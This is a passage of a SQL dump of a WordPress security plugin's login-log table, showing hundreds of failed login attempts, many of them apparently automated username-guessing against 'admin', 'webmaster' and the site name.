(99462, 1493104436.000675, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702756256, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99463, 1493104704.588941, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2943288819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99464, 1493104871.762865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2738198454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99465, 1493113576.502924, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892283248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99466, 1493113581.121560, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892283248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99467, 1493114994.167128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1402516394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99468, 1493114995.160015, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1402516394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99469, 1493119406.394865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2989586658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99470, 1493119407.571793, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2989586658, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99471, 1493120525.805473, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3116416041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99472, 1493120526.780515, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3116416041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99473, 1493121788.288927, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1401323221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99474, 1493121993.747385, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704787301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99475, 1493121995.082455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704787301, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99476, 1493123094.155899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887842097, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99477, 1493125991.354930, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781684966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99478, 1493125992.703420, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 781684966, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99479, 1493126386.592271, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 534420026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99480, 1493126389.607128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 534420026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99481, 1493126956.229665, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3167951747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99482, 1493126957.329731, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3167951747, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99483, 1493127875.985981, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609050352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99484, 1493127878.304189, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 609050352, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99485, 1493132339.289717, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1293756220, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99486, 1493135589.981152, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938229159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99487, 1493135591.613757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938229159, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99488, 1493135802.634101, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 456761165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99489, 1493135805.134268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 456761165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99490, 1493139944.462680, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99491, 1493140445.710075, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412935119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99492, 1493140447.059792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412935119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99493, 1493140510.656040, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99494, 1493141070.160433, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99495, 1493141221.554832, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702589396, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99496, 1493141825.286031, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99497, 1493142142.883487, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2038180494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99498, 1493142145.515538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2038180494, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(99499, 1493142764.802831, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99500, 1493143716.226437, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99501, 1493144688.263825, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99502, 1493145635.018631, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99503, 1493146602.638646, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99504, 1493146784.079208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1572107495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99505, 1493146785.916818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1572107495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99506, 1493146806.497838, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742066674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99507, 1493146807.972560, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742066674, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99508, 1493147556.220274, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99509, 1493148514.861478, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99510, 1493149452.434113, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99511, 1493150409.444203, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99512, 1493151347.051127, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99513, 1493152168.310479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3017071845, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99514, 1493152292.718131, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99515, 1493152919.695548, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419297473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99516, 1493152921.620875, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3419297473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99517, 1493153084.984605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991534124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99518, 1493153086.044922, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991534124, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99519, 1493153221.601201, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99520, 1493153389.273865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321521735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99521, 1493153390.729604, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321521735, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99522, 1493154136.404367, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99523, 1493155087.247995, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99524, 1493156022.676183, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99525, 1493158161.305216, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1940335041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99526, 1493158162.739488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1940335041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99527, 1493158682.897042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2957549377, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99528, 1493163212.752834, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1565928623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99529, 1493163304.923701, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1318488388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99530, 1493163307.135378, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1318488388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99531, 1493163836.102864, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938114477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99532, 1493163837.752611, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1938114477, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99533, 1493165930.870027, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182212288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99534, 1493168329.653026, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1223522106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99535, 1493169152.921648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1590804861, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99536, 1493171657.831037, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99537, 1493172615.028244, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99538, 1493173589.673707, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99539, 1493174545.616777, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99540, 1493176136.886277, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99541, 1493176793.919308, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3360841433, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99542, 1493177089.265276, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99543, 1493178027.558960, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99544, 1493178039.960202, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741414545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99545, 1493178044.650879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741414545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99546, 1493178983.125953, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99547, 1493179926.476166, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99548, 1493180924.421735, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99549, 1493181817.084668, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3383524734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99550, 1493181818.346708, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3383524734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99551, 1493181935.063475, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99552, 1493182958.183617, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99553, 1493183976.208673, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99554, 1493184974.377329, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99555, 1493185984.641289, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99556, 1493186993.286969, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99557, 1493188025.877518, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99558, 1493188933.931757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1963147486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99559, 1493188936.389724, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1963147486, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99560, 1493189046.824289, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99561, 1493190061.404720, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99562, 1493195192.799062, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 832022104, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99563, 1493195703.916775, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657625553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99564, 1493195705.645021, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657625553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99565, 1493196028.472537, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995909574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99566, 1493196030.212352, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 995909574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99567, 1493196342.533121, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742337306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99568, 1493196343.839655, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742337306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99569, 1493197084.433285, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1995212473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99570, 1493197085.856986, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1995212473, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99571, 1493197801.354325, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702781337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99572, 1493198050.668823, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 241309309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99573, 1493198052.930812, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 241309309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99574, 1493199694.397718, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1028683009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99575, 1493199695.907478, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1028683009, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99576, 1493200495.433788, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99577, 1493200497.028295, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99578, 1493200498.745923, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99579, 1493200500.418658, 1, 'loginFailValidUsername', 'pablo', 3, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99580, 1493200502.116464, 1, 'loginFailValidUsername', 'admin', 1, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99581, 1493201516.522809, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892330172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99582, 1493201518.520897, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892330172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99583, 1493206386.100198, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99584, 1493207423.043235, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99585, 1493207575.717109, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1054327665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99586, 1493207576.976518, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1054327665, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99587, 1493209499.165092, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99588, 1493209585.861984, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741892031, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99589, 1493209587.085096, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741892031, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99590, 1493210545.087582, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99591, 1493211581.118971, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99592, 1493212182.683583, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136357551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99593, 1493212184.102935, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3136357551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99594, 1493212595.671304, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99595, 1493213611.588829, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1856572143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99596, 1493213613.252578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1856572143, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99597, 1493213632.082424, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99598, 1493214660.505697, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99599, 1493215275.694368, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3557015878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99600, 1493215703.733647, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99601, 1493216472.816944, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835651188, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99602, 1493216739.615513, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99603, 1493217763.151734, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99604, 1493218946.020727, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1372304315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99605, 1493219880.345459, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
